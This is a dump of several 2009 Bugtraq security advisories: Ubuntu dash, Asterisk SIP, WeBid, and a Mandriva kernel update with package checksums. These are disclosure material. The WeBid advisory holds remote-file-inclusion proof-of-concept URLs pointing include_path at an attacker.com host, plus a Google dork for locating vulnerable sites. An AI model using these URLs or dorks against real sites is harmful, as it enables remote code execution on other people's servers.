===========================================================
Ubuntu Security Notice USN-732-1 March 10, 2009
dash vulnerability
CVE-2009-0854
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 8.04 LTS:
dash 0.5.4-8ubuntu1.1
Ubuntu 8.10:
dash 0.5.4-9ubuntu1.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Wolfgang M. Reimer discovered that dash, when invoked as a login shell, would
source .profile files from the current directory. Local users may be able to
bypass security restrictions and gain root privileges by placing specially
crafted .profile files where they might get sourced by other dash users.
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.diff.gz
Size/MD5: 171656 5f74e0a922546193a9e6279ad8680c76
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1.dsc
Size/MD5: 697 e78236937fea17c0c7a43427321b1ce6
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
Size/MD5: 212145 bc457e490a589d2f87f2333616b67931
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-8ubuntu1.1_all.deb
Size/MD5: 22068 82557822348627c1b240069e431886e2
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_amd64.deb
Size/MD5: 96918 b8d43124e5353042c7fd93fcc5c19cc9
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_i386.deb
Size/MD5: 87952 6bc4578aea92450f8e00625fd7a7755a
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_lpia.deb
Size/MD5: 88194 a90de1a5dedb9cbaeb65537e8e933356
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_powerpc.deb
Size/MD5: 97400 5e2187820648d980b4edaa4e4a71b6c5
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-8ubuntu1.1_sparc.deb
Size/MD5: 91072 dc5e22376445e185eacdaa049421c866
Updated packages for Ubuntu 8.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.diff.gz
Size/MD5: 129759 b5363e9ff9550e89dec4be8ddc408607
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1.dsc
Size/MD5: 1083 dc87a11f64c53960ffb1f55dc42a253f
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4.orig.tar.gz
Size/MD5: 212145 bc457e490a589d2f87f2333616b67931
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/d/dash/ash_0.5.4-9ubuntu1.1_all.deb
Size/MD5: 22286 9a34d34a67d46b8fa42584a2a7d61f76
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_amd64.deb
Size/MD5: 99406 8703819fce4bc25f65caa350de05763c
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_i386.deb
Size/MD5: 90266 9d8931f5ef08f4d649127db0ab644f8e
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_lpia.deb
Size/MD5: 90322 a0db897e7a7c5a7706d71674bad025ee
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_powerpc.deb
Size/MD5: 99500 a583f4a7fc59a7495cb3615c4af54b05
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/d/dash/dash_0.5.4-9ubuntu1.1_sparc.deb
Size/MD5: 93030 1bd3a8c0907e56cb2ed17c572e61842b
--=-UJW/IxyRJzuGmm9cjozh
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkm2m1gACgkQLMAs/0C4zNqpSgCeLpcCwv2HxQbBl47MmmbGyyJn
FHIAnAqxJRRcam0OyXgwgOY+WuUpfvld
=cZeU
-----END PGP SIGNATURE-----
--=-UJW/IxyRJzuGmm9cjozh--
From - Tue Mar 10 14:31:14 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000689e
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39704-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 3E500ED81C
for <lists@securityspace.com>; Tue, 10 Mar 2009 14:28:01 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 81F18237390; Tue, 10 Mar 2009 10:43:32 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20691 invoked from network); 10 Mar 2009 17:02:45 -0000
To: bugtraq@securityfocus.com
From: "Asterisk Security Team" <security@asterisk.org>
Subject: AST-2009-002: Remote Crash Vulnerability in SIP channel driver
Message-Id: <E1Lh5uX-00022G-2b@mail.digium.com>
Date: Tue, 10 Mar 2009 12:38:37 -0500
Status:
Asterisk Project Security Advisory - AST-2009-002
+------------------------------------------------------------------------+
| Product | Asterisk |
|---------------------+--------------------------------------------------|
| Summary | Remote Crash Vulnerability in SIP channel driver |
|---------------------+--------------------------------------------------|
| Nature of Advisory | Denial of Service |
|---------------------+--------------------------------------------------|
| Susceptibility | Remote Authenticated Sessions |
|---------------------+--------------------------------------------------|
| Severity | Moderate |
|---------------------+--------------------------------------------------|
| Exploits Known | No |
|---------------------+--------------------------------------------------|
| Reported On | February 6, 2009 |
|---------------------+--------------------------------------------------|
| Reported By | bugs.digium.com user klaus3000 |
|---------------------+--------------------------------------------------|
| Posted On | March 10, 2009 |
|---------------------+--------------------------------------------------|
| Last Updated On | March 10, 2009 |
|---------------------+--------------------------------------------------|
| Advisory Contact | Joshua Colp <jcolp@digium.com> |
|---------------------+--------------------------------------------------|
| CVE Name | |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Description | When configured with pedantic=yes the SIP channel driver |
| | performs extra request URI checking on an INVITE |
| | received as a result of a SIP spiral. As part of this |
| | extra checking the headers from the outgoing SIP INVITE |
| | sent and the received SIP INVITE are compared. The code |
| | incorrectly assumes that the string for each header |
| | passed in will be non-NULL in all cases. This is |
| | incorrect because if no headers are present the value |
| | passed in will be NULL. |
| | |
| | The values passed into the code are now checked to be |
| | non-NULL before being compared. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Resolution | Upgrade to revision 174082 of the 1.4 branch, 174085 of |
| | the 1.6.0 branch, 174086 of the 1.6.1 branch, or one of |
| | the releases noted below. |
| | |
| | The pedantic option in the SIP channel driver can also be |
| | turned off to prevent this issue from occurring. |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Affected Versions |
|------------------------------------------------------------------------|
| Product | Release | |
| | Series | |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.2.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.4.x | Versions 1.4.22, 1.4.23, |
| | | 1.4.23.1 |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.6.0.x | All versions prior to 1.6.0.6 |
|----------------------------+---------+---------------------------------|
| Asterisk Open Source | 1.6.1.x | All versions prior to |
| | | 1.6.1.0-rc2 |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.2.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.4.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Addons | 1.6.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | A.x.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | B.x.x | Not affected |
|----------------------------+---------+---------------------------------|
| Asterisk Business Edition | C.x.x | Only version C.2.3 |
|----------------------------+---------+---------------------------------|
| s800i (Asterisk Appliance) | 1.2.x | Not affected |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Corrected In |
|------------------------------------------------------------------------|
| Product | Release |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.4.23.2 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.6.0.6 |
|-------------------------------------------+----------------------------|
| Asterisk Open Source | 1.6.1.0-rc2 |
|-------------------------------------------+----------------------------|
| Asterisk Business Edition | C.2.3.2 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Patches |
|------------------------------------------------------------------------|
| URL |Branch|
|-----------------------------------------------------------------+------|
|
http://downloads.digium.com/pub/security/AST-2009-002-1.4.diff |1.4 |
|-----------------------------------------------------------------+------|
|
http://downloads.digium.com/pub/security/AST-2009-002-1.6.0.diff |1.6.0 |
|-----------------------------------------------------------------+------|
|
http://downloads.digium.com/pub/security/AST-2009-002-1.6.1.diff |1.6.1 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Links |
http://bugs.digium.com/view.php?id417 |
| | |
| |
http://bugs.digium.com/view.php?id547 |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Asterisk Project Security Advisories are posted at |
|
http://www.asterisk.org/security |
| |
| This document may be superseded by later versions; if so, the latest |
| version will be posted at |
|
http://downloads.digium.com/pub/security/AST-2009-002.pdf and |
|
http://downloads.digium.com/pub/security/AST-2009-002.html |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Revision History |
|------------------------------------------------------------------------|
| Date | Editor | Revisions Made |
|------------------+--------------------+--------------------------------|
| 2009-03-10 | Joshua Colp | Initial release |
+------------------------------------------------------------------------+
Asterisk Project Security Advisory - AST-2009-002
Copyright (c) 2009 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its
original, unaltered form.
From - Tue Mar 10 15:01:12 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39705-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4E680ED8B8
for <lists@securityspace.com>; Tue, 10 Mar 2009 14:59:00 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id ADBEE2370D1; Tue, 10 Mar 2009 11:54:23 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 23041 invoked from network); 10 Mar 2009 17:37:01 -0000
Date: Tue, 10 Mar 2009 12:10:49 -0600
Message-Id: <200903101810.n2AIAnHG006291@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln@e-rdc.org
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File
Inclution Vulnerabilities
Status:
ECHO_ADV_104$2009
-----------------------------------------------------------------------------------------
[ECHO_ADV_104$2009] WeBid <= 0.7.3 RC9 Multiple Remote File Inclution Vulnerabilities
-----------------------------------------------------------------------------------------
Author : K-159
Date : March, 11 th 2009
Location : Jakarta, Indonesia
Web :
http://e-rdc.org/v1/news.php?readmore7
Critical Lvl : High
Impact : System Access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : WeBid
version : <= 0.7.3 RC9
Vendor :
http://sourceforge.net/projects/simpleauction
http://www.webidsupport.com/
Description :
WeBid is Open source php/mysql fully featured auction script. Perfect for those who want to start their own auction site.
--------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
Input passed to the "$include_path" parameter in cron.php page is not properly verified before being used
to include files.This can be exploited to include arbitrary files from local or external resources.
This vulnerability also happen to files ST_browsers.php, ST_countries.php, ST_platforms.php in admin's folder
Successful exploitation requires that "register_globals" is enabled.
Poc/Exploit:
~~~~~~~~~
http://www.example.com/[path]/cron.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_brwosers.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_countries.php?include_path=http://www.attacker.com/evil?
http://www.example.com/[path]/admin/ST_platforms.php?include_path=http://www.attacker.com/evil?
Dork:
~~~~~
Google : "copyright 2008, WEBID"
Solution:
~~~~~~~
- Edit the source code to ensure that input is properly verified.
- turn off register_globals.
Timeline:
~~~~~~~~~
- 08 - 03 - 2009 bug found
- 08 - 03 - 2009 vendor contacted
- 08 - 03 - 2009 vendor response
- 11 - 03 - 2009 advisory release
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ ping - my dearest wife, zizou - my beloved son, i-eyes - my beloved daughter.
~ y3dips,the_day,Negatif,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,pushm0v,az001,
the_hydra,neng chika, str0ke
~ scanners [at] SCAN-NUSANTARA and SCAN-ASSOCIATES
~ SK,Abond,pokley,cybertank, super_temon,whatsoever,b120t0,inggar,fachri,adi,rahmat,indra
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,sakitjiwa,x16,cyb3rh3b,cR4SH3R,ogeb,bagan,devsheed
~ dr188le,cow_1seng,poniman_coy,paman_gembul,ketut,rizal,ghostblup,shamus,
kuntua, stev_manado,nofry,k1tk4t,0pt1c,k1ngk0ng
~ newbie_hacker@yahoogroups.com
~ milw0rm.com, macaholic.info, unitiga.com, mac.web.id, indowebster.com
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~
K-159 || echo|staff || adv[at]e-rdc[dot]org
Homepage:
http://www.e-rdc.org/
-------------------------------- [ EOF ] ----------------------------------
From - Tue Mar 10 16:31:13 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000068a2
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39706-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 734E0ED8B5
for <lists@securityspace.com>; Tue, 10 Mar 2009 16:30:34 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 3C5DE236F65; Tue, 10 Mar 2009 13:25:08 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25960 invoked from network); 10 Mar 2009 18:29:23 -0000
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:071 ] kernel
Date: Tue, 10 Mar 2009 20:03:01 +0100
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1Lh7ED-0002rV-65@titan.mandriva.com>
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2009:071
http://www.mandriva.com/security/
_______________________________________________________________________
Package : kernel
Date : March 10, 2009
Affected: 2009.0
_______________________________________________________________________
Problem Description:
Some vulnerabilities were discovered and corrected in the Linux
2.6 kernel:
The skfp_ioctl function in drivers/net/skfp/skfddi.c in the Linux
kernel before 2.6.28.6 permits SKFP_CLR_STATS requests only when the
CAP_NET_ADMIN capability is absent, instead of when this capability
is present, which allows local users to reset the driver statistics,
related to an inverted logic issue. (CVE-2009-0675)
The sock_getsockopt function in net/core/sock.c in the Linux kernel
before 2.6.28.6 does not initialize a certain structure member, which
allows local users to obtain potentially sensitive information from
kernel memory via an SO_BSDCOMPAT getsockopt request. (CVE-2009-0676)
Additionaly, this update provides stable 1.0.18 ALSA updates/fixes,
STAC92HD71Bx/STAC92HD75Bx hda-intel support changes/fixes
(affects sound chip codecs used on several HP dv laptop series),
fixes/enhancements for HP Educ.ar machine HDA sound support, minor
alsa hda-intel code cleanup for ALC888 6stack-dell model, to stop
printing uneeded output to kernel log, and a few more things. Check
the package changelog for details.
To update your kernel, please follow the directions located at:
http://www.mandriva.com/en/security/kernelupdate
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0676
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2009.0:
61afebcd3771e9e0ab1bad53e3f8373a 2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-desktop-1mnb-0.5.1-2mdv2008.0.i586.rpm
27d03985a836b7b94e72d7315c156987 2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-desktop586-1mnb-0.5.1-2mdv2008.0.i586.rpm
d9da9f1c32d118c6f639239337196cc9 2009.0/i586/alsa_raoppcm-kernel-2.6.27.19-server-1mnb-0.5.1-2mdv2008.0.i586.rpm
65c1548d0c1fab5cf5c09c5b182ea3cb 2009.0/i586/alsa_raoppcm-kernel-desktop586-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
0cf0195037dd993090eebd533c628871 2009.0/i586/alsa_raoppcm-kernel-desktop-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
df49df642b44707f972076bdd5c947af 2009.0/i586/alsa_raoppcm-kernel-server-latest-0.5.1-1.20090305.2mdv2008.0.i586.rpm
0a050010bd2813b68102f6ff883e2d2f 2009.0/i586/drm-experimental-kernel-2.6.27.19-desktop-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
46bfb873303de28e996129e42e7f4a85 2009.0/i586/drm-experimental-kernel-2.6.27.19-desktop586-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
e9a08199d657acc65e60f140717f72a8 2009.0/i586/drm-experimental-kernel-2.6.27.19-server-1mnb-2.3.0-2.20080912.1mdv2009.0.i586.rpm
3108e8192dbc5f3bd8132fafcd550e46 2009.0/i586/drm-experimental-kernel-desktop586-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
c974b12ec1b9e17934910fa2fdc65875 2009.0/i586/drm-experimental-kernel-desktop-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
0dc0c43be39fa0cfc67999912be31e50 2009.0/i586/drm-experimental-kernel-server-latest-2.3.0-1.20090305.2.20080912.1mdv2009.0.i586.rpm
6dba4fd0c629cfab5f0a4238e691c450 2009.0/i586/et131x-kernel-2.6.27.19-desktop-1mnb-1.2.3-7mdv2009.0.i586.rpm
08f48bfe132d1d3bfd8c84bf60b21f94 2009.0/i586/et131x-kernel-2.6.27.19-desktop586-1mnb-1.2.3-7mdv2009.0.i586.rpm
310225a864a0a24708e0aa8e1c5bc87d 2009.0/i586/et131x-kernel-2.6.27.19-server-1mnb-1.2.3-7mdv2009.0.i586.rpm
d6028a9d3ccdd543868e1f8f2309375e 2009.0/i586/et131x-kernel-desktop586-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
470057078784c367ff2ee987c4efc3b4 2009.0/i586/et131x-kernel-desktop-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
9611daac352b2b5a5ce66de0a175b40e 2009.0/i586/et131x-kernel-server-latest-1.2.3-1.20090305.7mdv2009.0.i586.rpm
1f4be7e785fe4bbd23cf52e549ad31d4 2009.0/i586/fcpci-kernel-2.6.27.19-desktop-1mnb-3.11.07-7mdv2009.0.i586.rpm
9259df8eea95ab4c6be94ff94752352c 2009.0/i586/fcpci-kernel-2.6.27.19-desktop586-1mnb-3.11.07-7mdv2009.0.i586.rpm
37f645421d0a3eef7a013061b6402bd4 2009.0/i586/fcpci-kernel-2.6.27.19-server-1mnb-3.11.07-7mdv2009.0.i586.rpm
a9c38157f40eef9eecdededba8b93bc5 2009.0/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
1259abf8542a729034e2a3caa24353c0 2009.0/i586/fcpci-kernel-desktop-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
fbdb64d37e35742adbc5719d41f9b2c1 2009.0/i586/fcpci-kernel-server-latest-3.11.07-1.20090305.7mdv2009.0.i586.rpm
8925cf262ad2b33d13b0ef6cb5ec41b1 2009.0/i586/fglrx-kernel-2.6.27.19-desktop-1mnb-8.522-3mdv2009.0.i586.rpm
73e0ec5851fcfb99d06be9f0d5203a06 2009.0/i586/fglrx-kernel-2.6.27.19-desktop586-1mnb-8.522-3mdv2009.0.i586.rpm
eedcc5a0f371222ddc2eb5482d737bc8 2009.0/i586/fglrx-kernel-2.6.27.19-server-1mnb-8.522-3mdv2009.0.i586.rpm
fd0464982249318d17b9f6cfd2451859 2009.0/i586/fglrx-kernel-desktop586-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
e3898f97fa6a5a148b6ac24a73bf47e6 2009.0/i586/fglrx-kernel-desktop-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
64d5ee23095c3617b7fa47c9fab43519 2009.0/i586/fglrx-kernel-server-latest-8.522-1.20090305.3mdv2009.0.i586.rpm
5ee316c17206494b6f25c17035e9e53e 2009.0/i586/gnbd-kernel-2.6.27.19-desktop-1mnb-2.03.07-2mdv2009.0.i586.rpm
d781b5704e4afffe08cd8a78bdde43a0 2009.0/i586/gnbd-kernel-2.6.27.19-desktop586-1mnb-2.03.07-2mdv2009.0.i586.rpm
20f877e569d893f0f6808ac5f023fc3b 2009.0/i586/gnbd-kernel-2.6.27.19-server-1mnb-2.03.07-2mdv2009.0.i586.rpm
79f3ba9a48b1d2436269b963f9d7199e 2009.0/i586/gnbd-kernel-desktop586-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
c6e0d5becd4f7cc0302b258a5269839c 2009.0/i586/gnbd-kernel-desktop-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
b389ed157d1692fda551b2b125543f7c 2009.0/i586/gnbd-kernel-server-latest-2.03.07-1.20090305.2mdv2009.0.i586.rpm
d992626da9eba81fed080093841ba50e 2009.0/i586/hcfpcimodem-kernel-2.6.27.19-desktop-1mnb-1.17-1.2mdv2009.0.i586.rpm
66eb8aee73d3f1aac15fb46cdce1eaf9 2009.0/i586/hcfpcimodem-kernel-2.6.27.19-desktop586-1mnb-1.17-1.2mdv2009.0.i586.rpm
b1afbdd9e1b048fa00e85a51e6b59e57 2009.0/i586/hcfpcimodem-kernel-2.6.27.19-server-1mnb-1.17-1.2mdv2009.0.i586.rpm
e3cf741c353bd1e0fa8af1b8aca15f88 2009.0/i586/hcfpcimodem-kernel-desktop586-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
ebebf07db6ac43826de0ffee0f079d34 2009.0/i586/hcfpcimodem-kernel-desktop-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
d92da18ccf2855881f2ffb006d1df04e 2009.0/i586/hcfpcimodem-kernel-server-latest-1.17-1.20090305.1.2mdv2009.0.i586.rpm
db7a83573cc2a4e81dbcda769cfd23c2 2009.0/i586/hsfmodem-kernel-2.6.27.19-desktop-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
23454d0f0418e0a0fcd9ad8add343400 2009.0/i586/hsfmodem-kernel-2.6.27.19-desktop586-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
f3ff6ad3908f5c57e9ccb0142eddfad6 2009.0/i586/hsfmodem-kernel-2.6.27.19-server-1mnb-7.68.00.13-1.2mdv2009.0.i586.rpm
6d989426917fa819f193bd0020baea1d 2009.0/i586/hsfmodem-kernel-desktop586-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
b358ef6bce77e69efd87e63eb770ccf5 2009.0/i586/hsfmodem-kernel-desktop-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
1ea085063a1d26dca7ff5faa8e4ab060 2009.0/i586/hsfmodem-kernel-server-latest-7.68.00.13-1.20090305.1.2mdv2009.0.i586.rpm
2ea3e6c680ac8020dfb0ee277c4b7597 2009.0/i586/hso-kernel-2.6.27.19-desktop-1mnb-1.2-2mdv2009.0.i586.rpm
3c435d935202dc8e70aa0241c5d142a9 2009.0/i586/hso-kernel-2.6.27.19-desktop586-1mnb-1.2-2mdv2009.0.i586.rpm
a0db9fa6fe6a174988de553e83b7bcfe 2009.0/i586/hso-kernel-2.6.27.19-server-1mnb-1.2-2mdv2009.0.i586.rpm
f4fe9969486a3d43adaaf3c4b2c2a22e 2009.0/i586/hso-kernel-desktop586-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
8ded44f50a794f2fe0f11170a2ff62b7 2009.0/i586/hso-kernel-desktop-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
336abd9a2e72fb5d90814fe9ac5b01da 2009.0/i586/hso-kernel-server-latest-1.2-1.20090305.2mdv2009.0.i586.rpm
a0a1685639462c8fb6eb575946c17644 2009.0/i586/iscsitarget-kernel-2.6.27.19-desktop-1mnb-0.4.16-4mdv2009.0.i586.rpm
478eb2a9bdc27beb634d43c1b33d87b2 2009.0/i586/iscsitarget-kernel-2.6.27.19-desktop586-1mnb-0.4.16-4mdv2009.0.i586.rpm
79736958877a505789cf8191c142c26a 2009.0/i586/iscsitarget-kernel-2.6.27.19-server-1mnb-0.4.16-4mdv2009.0.i586.rpm
8dadf90ae5a81283449d2bbe823087be 2009.0/i586/iscsitarget-kernel-desktop586-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
eae908574de207cf4458057be7956fdd 2009.0/i586/iscsitarget-kernel-desktop-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
f5b7de5bd0e4800e55f80a4a1a92db45 2009.0/i586/iscsitarget-kernel-server-latest-0.4.16-1.20090305.4mdv2009.0.i586.rpm
0ce632fc9d380e114fada972964c502d 2009.0/i586/kernel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
6b8e289ceb3972536a2c88ada8ccda90 2009.0/i586/kernel-desktop-2.6.27.19-1mnb-1-1mnb2.i586.rpm
0a9b994300bdd16b21df73fa032c96ad 2009.0/i586/kernel-desktop586-2.6.27.19-1mnb-1-1mnb2.i586.rpm
51792334b882becae8f343539a5e1ecc 2009.0/i586/kernel-desktop586-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
203f44f86c8fd1973a289865a59ef0a7 2009.0/i586/kernel-desktop586-devel-latest-2.6.27.19-1mnb2.i586.rpm
cc34e8b5e87d0a87717083f01a16692c 2009.0/i586/kernel-desktop586-latest-2.6.27.19-1mnb2.i586.rpm
76dd17772c1b177d44856a0d5716e694 2009.0/i586/kernel-desktop-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
acc605a833530b3ae488f3f00892cd64 2009.0/i586/kernel-desktop-devel-latest-2.6.27.19-1mnb2.i586.rpm
34d5777839cf9b258e6b2026ab5da08d 2009.0/i586/kernel-desktop-latest-2.6.27.19-1mnb2.i586.rpm
5835679f4bcaf386d26d61c629e08c57 2009.0/i586/kernel-doc-2.6.27.19-1mnb2.i586.rpm
6dd8df32763137f3d0b91f3405a5b7e1 2009.0/i586/kernel-server-2.6.27.19-1mnb-1-1mnb2.i586.rpm
42597987e49a2ed38ba2ea6ae96c916b 2009.0/i586/kernel-server-devel-2.6.27.19-1mnb-1-1mnb2.i586.rpm
2cafd8d1761dab0aed0caae62fe470b3 2009.0/i586/kernel-server-devel-latest-2.6.27.19-1mnb2.i586.rpm
3ddcc6a4e696e0a7033d259abdf6ff2b 2009.0/i586/kernel-server-latest-2.6.27.19-1mnb2.i586.rpm
